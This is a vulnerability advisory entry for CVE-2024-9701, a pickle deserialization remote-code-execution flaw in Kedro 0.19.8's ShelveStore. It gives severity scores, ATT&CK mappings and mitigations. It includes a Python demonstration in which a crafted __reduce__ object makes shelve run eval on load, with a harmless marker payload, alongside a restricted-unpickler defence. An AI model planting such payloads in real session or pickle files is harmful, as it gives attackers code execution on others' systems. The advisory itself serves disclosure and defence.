
CVE-2024-9701

Critical · RCE

Published: 20 March 2025
Modified: 15 April 2026
KEV Added: not listed
CVSS v3 base score: 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS score: 0.0614 (91.0th percentile)
Risk Priority: 23 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2024-9701 is a critical-severity Deserialization of Untrusted Data (CWE-502) vulnerability in the Kedro ShelveStore class. Its CVSS 3.0 base score is 9.8 (Critical).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). Its EPSS percentile places it in the top 9.0% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

The strongest mitigations identified are NIST 800-53 AC-3 (Access Enforcement), which limits who can write to the shelve file the payload must land in, and SI-2 (Flaw Remediation), i.e. applying the upstream fix.

Deeper analysis

A Remote Code Execution vulnerability tracked as CVE-2024-9701 affects the ShelveStore class in Kedro version 0.19.8. The class persists session data with Python's shelve module, and shelve serializes every stored value with pickle. Unpickling is not a data-only operation: a pickle stream can name any importable callable and have it invoked during load, so whoever controls the bytes in the shelve file controls code execution in the process that reads it. The issue is classified under CWE-502 and carries a CVSS 3.0 score of 9.8.

The precondition is the ability to place a crafted pickle payload in a shelve file that ShelveStore later reads, either by writing the file directly or by getting attacker-controlled data serialized into it. When ShelveStore deserializes that entry, the payload runs as arbitrary Python in the Kedro process, with full impact on confidentiality, integrity, and availability and the potential for complete system compromise.

A fix is referenced in Kedro project commit d79fa51de55ac0ccb58cce1a482df1b445f0fe7c, and further details are available in the associated huntr.com bounty report. The EPSS score has remained modest, with a current value of 0.0614 and a peak of 0.0762.


Vulnerability details

A Remote Code Execution (RCE) vulnerability has been identified in the Kedro ShelveStore class (version 0.19.8). This vulnerability allows an attacker to execute arbitrary Python code via deserialization of malicious payloads, potentially leading to a full system compromise. The ShelveStore class uses Python's shelve module to manage session data, which relies on pickle for serialization. Crafting a malicious payload and storing it in the shelve file can lead to RCE when the payload is deserialized.
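The mechanism described above, as an added example that is neither Kedro's code nor the huntr report's proof of concept: a shelve entry whose pickle resolves builtins.eval is written the way any shelve-backed store writes it, then read back once through plain shelve.open() (the vulnerable pattern) and once through a Shelf subclass whose Unpickler refuses every global lookup. The file names, the environment-variable marker the payload sets, and the sample session dict are constructed for this demonstration; a real payload would call os.system rather than set a marker.

```python
import dbm
import io
import os
import pickle
import shelve
import tempfile

# Assumed names for the demonstration only; nothing here is Kedro's own code.
MARKER_VAR = "SHELVE_DEMO_MARKER"
MARKER_VAL = "code ran during unpickling"


class MaliciousSessionData:
    """Object whose pickle encodes a call to builtins.eval instead of an object.

    On load, pickle resolves builtins.eval by name and calls it with EXPR.
    The expression only sets an environment variable so the effect is
    observable and harmless; the attacker chooses what it does.
    """

    EXPR = f"__import__('os').environ.setdefault({MARKER_VAR!r}, {MARKER_VAL!r})"

    def __reduce__(self):
        return (eval, (self.EXPR,))


def write_session(path, value, key="session"):
    """Store a value the way a shelve-backed session store does: pickled."""
    with shelve.open(path, "c") as store:
        store[key] = value  # pickled now; nothing executes until it is read back


def load_unsafe(path, key="session"):
    """The vulnerable pattern: shelve unpickles whatever bytes sit in the file."""
    with shelve.open(path, "r") as store:
        return store[key]


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup, so only literals and containers can be rebuilt."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


class RestrictedShelf(shelve.Shelf):
    """A Shelf whose reads go through RestrictedUnpickler.

    Uses shelve.Shelf's .dict (the underlying dbm mapping) and .keyencoding.
    """

    def __getitem__(self, key):
        raw = self.dict[key.encode(self.keyencoding)]
        return RestrictedUnpickler(io.BytesIO(raw)).load()


def load_restricted(path, key="session"):
    with RestrictedShelf(dbm.open(path, "r")) as store:
        return store[key]


def demo():
    """Run the payload through both loaders and report what happened."""
    os.environ.pop(MARKER_VAR, None)
    with tempfile.TemporaryDirectory() as tmp:
        evil = os.path.join(tmp, "session_evil")      # attacker-writable file
        benign = os.path.join(tmp, "session_benign")  # ordinary session data
        write_session(evil, MaliciousSessionData())
        write_session(benign, {"user": "alice", "run_id": 42})  # constructed sample
        wrote_without_executing = MARKER_VAR not in os.environ

        unsafe_value = load_unsafe(evil)  # eval runs during this call
        code_ran = os.environ.get(MARKER_VAR) == MARKER_VAL

        try:
            load_restricted(evil)
            blocked = False
        except pickle.UnpicklingError:
            blocked = True
        benign_value = load_restricted(benign)  # plain data still loads

    return {
        "wrote_without_executing": wrote_without_executing,
        "unsafe_value": unsafe_value,
        "code_ran_on_load": code_ran,
        "restricted_blocked": blocked,
        "benign_via_restricted": benign_value,
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

Writing the payload is inert; the code runs at the moment the stored value is read, which is why a file-permission control (AC-3) on the shelve file is a real mitigation and why input validation before serialization only narrows the attack surface. The restricted loader above stops payloads that need a global lookup, but the durable fix is to stop unpickling attacker-writable data at all, for instance by persisting session data in a format that cannot encode calls, such as JSON.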

CWE(s): CWE-502 Deserialization of Untrusted Data

Related Threats

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.006 Command and Scripting Interpreter: Python (Execution)
Adversaries may abuse Python commands and scripts for execution.
Why these techniques?

RCE via Python pickle deserialization in ShelveStore gives an Internet-facing Kedro deployment an initial-access path (T1190), and the payload itself runs as arbitrary Python inside the application process (T1059.006).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-26220 (shared CWE-502)
CVE-2026-31234 (shared CWE-502)
CVE-2026-31072 (shared CWE-502)
CVE-2025-27780 (shared CWE-502)
CVE-2025-50460 (shared CWE-502)
CVE-2025-27779 (shared CWE-502)
CVE-2025-27781 (shared CWE-502)
CVE-2025-62373 (shared CWE-502)
CVE-2025-24016 (shared CWE-502)
CVE-2026-31237 (shared CWE-502)

Affected Assets: Kedro 0.19.8 (ShelveStore class)

Mitigating Controls (NIST 800-53 r5)

SI-2 Flaw Remediation (prevent)
Requires timely identification, reporting, and patching of the deserialization flaw in Kedro ShelveStore (version 0.19.8); applying the referenced fix commit removes the RCE path directly.

AC-3 Access Enforcement (prevent)
Enforces approved access authorizations on the shelve files, so an attacker cannot write the pickle payload that deserialization-based RCE requires.

Input validation (prevent)
Validates session data before it is serialized into shelve files, which limits injection of malicious deserialization payloads but does not address the root cause: unpickling data from a file an attacker may control.
